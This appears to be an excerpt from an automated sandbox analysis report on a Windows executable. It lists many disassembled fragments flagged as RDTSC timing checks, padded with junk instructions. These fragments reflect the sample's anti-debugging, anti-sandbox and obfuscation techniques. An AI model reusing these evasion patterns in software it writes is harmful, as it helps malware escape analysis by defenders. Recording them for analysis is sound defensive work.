              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F623A second address: 5F62E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29453582D6h 0x0000000a popad 0x0000000b jmp 00007F29453582DAh 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007F29453582E0h 0x00000017 nop 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov edi, esi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F29453582D8h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 00000018h 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 mov dword ptr [ebp+122D1A1Ch], edi 0x00000048 mov dword ptr [ebp+122D1E41h], edx 0x0000004e mov eax, dword ptr [ebp+122D15DDh] 0x00000054 mov dword ptr [ebp+122D17B1h], edx 0x0000005a push FFFFFFFFh 0x0000005c push 00000000h 0x0000005e push esi 0x0000005f call 00007F29453582D8h 0x00000064 pop esi 0x00000065 mov dword ptr [esp+04h], esi 0x00000069 add dword ptr [esp+04h], 0000001Ah 0x00000071 inc esi 0x00000072 push esi 0x00000073 ret 0x00000074 pop esi 0x00000075 ret 0x00000076 or dword ptr [ebp+122DB460h], eax 0x0000007c nop 0x0000007d push eax 0x0000007e push edx 0x0000007f push eax 0x00000080 push edx 0x00000081 jmp 00007F29453582DCh 0x00000086 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F62E5 second address: 5F62EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F62EB second address: 5F6305 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F29453582DCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F29453582D6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F6305 second address: 5F6313 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5FE7FB second address: 5FE807 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 5F359D second address: 5F35A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604B96 second address: 604BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F29453582D6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604BA2 second address: 604BA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604BA8 second address: 604BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F29453582DEh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604BC3 second address: 604BC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604BC7 second address: 604C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DAh 0x00000007 jmp 00007F29453582E9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jc 00007F29453582D8h 0x00000014 pushad 0x00000015 popad 0x00000016 jns 00007F29453582DCh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604D88 second address: 604D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604D8C second address: 604DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F29453582D6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29453582E2h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604DB0 second address: 604DBA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2944535536h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 604F17 second address: 604F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F29453582E3h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push ebx 0x00000013 jmp 00007F29453582E5h 0x00000018 pop ebx 0x00000019 popad 0x0000001a pushad 0x0000001b jmp 00007F29453582DAh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 607B9B second address: 607B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 60B001 second address: 60B00B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F29453582D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 60B092 second address: 60B098 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D742 second address: 64D756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2944535540h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D756 second address: 64D79A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E8h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F29453582D8h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jl 00007F29453582FBh 0x0000001a jmp 00007F29453582E3h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D79A second address: 64D79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64CC1C second address: 64CC21 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64CFF9 second address: 64D016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D172 second address: 64D189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582E3h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 64D464 second address: 64D468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 59D9A3 second address: 59D9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65A656 second address: 65A66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F294453553Ch 0x0000000b jbe 00007F294453553Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AA01 second address: 65AA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 js 00007F29453582D6h 0x0000000c jg 00007F29453582D6h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AA14 second address: 65AA62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F2944535536h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c ja 00007F294453553Eh 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 jmp 00007F294453553Eh 0x0000001c jmp 00007F294453553Eh 0x00000021 pop ecx 0x00000022 jns 00007F2944535542h 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AA62 second address: 65AA68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AEC2 second address: 65AEC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AEC8 second address: 65AECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65AFF2 second address: 65AFF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65B1A5 second address: 65B1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65C1F2 second address: 65C1F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65A079 second address: 65A07F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65A07F second address: 65A083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65A083 second address: 65A0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F29453582DBh 0x0000000e jmp 00007F29453582E1h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65E880 second address: 65E886 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65E886 second address: 65E894 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F29453582DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 65E894 second address: 65E898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6613D0 second address: 6613E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29453582DFh 0x00000009 jc 00007F29453582D6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6613E9 second address: 661409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535548h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 661409 second address: 661417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582DAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 666368 second address: 666395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F294453553Ah 0x00000009 pop esi 0x0000000a jmp 00007F2944535549h 0x0000000f popad 0x00000010 push edi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 666395 second address: 6663B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29453582E4h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 670320 second address: 670324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 674939 second address: 674948 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F29453582D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 674698 second address: 6746B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2944535546h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 677654 second address: 67765A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 677014 second address: 67702F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2944535547h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 67702F second address: 677039 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 677039 second address: 67703D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 67703D second address: 677043 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 68503B second address: 685052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2944535543h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 68668B second address: 68668F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 68668F second address: 686695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 686695 second address: 68669F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F29453582D6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 68669F second address: 6866A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 68939A second address: 6893A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6893A0 second address: 6893A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 689242 second address: 689249 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 690470 second address: 69047A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6905DD second address: 6905E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6905E3 second address: 6905F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F294453553Dh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6905F6 second address: 6905FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6905FC second address: 690619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F2944535543h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 690619 second address: 69061F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 690765 second address: 69076F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2944535536h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 69076F second address: 690790 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582E3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F29453582DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 697F29 second address: 697F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 697F2D second address: 697F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 69ABAF second address: 69ABB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 69A8BD second address: 69A8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 69A8C8 second address: 69A8D7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2944535536h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6A695C second address: 6A697A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F29453582E9h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 596DCD second address: 596DD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 596DD3 second address: 596DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007F29453582D6h 0x0000000d jnl 00007F29453582D6h 0x00000013 jmp 00007F29453582E6h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 596DFD second address: 596E0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F294453553Bh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6A67FE second address: 6A6818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F29453582D6h 0x0000000e jl 00007F29453582D6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6A6818 second address: 6A681E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6A681E second address: 6A683B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F29453582D6h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29453582DDh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6A683B second address: 6A6841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 591C4C second address: 591C53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 591C53 second address: 591C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6B980B second address: 6B9814 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C485F second address: 6C487E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2944535536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F2944535545h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C36E1 second address: 6C36E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3B23 second address: 6C3B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3B27 second address: 6C3B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3B2B second address: 6C3B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3B35 second address: 6C3B41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jns 00007F29453582D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3F9C second address: 6C3FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C3FA0 second address: 6C3FB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29453582DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C40EF second address: 6C4113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007F2944535549h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4113 second address: 6C4119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4240 second address: 6C4245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4245 second address: 6C4251 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29453582DEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random(2).exeRDTSC instruction interceptor: First address: 6C4504 second address: 6C4508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
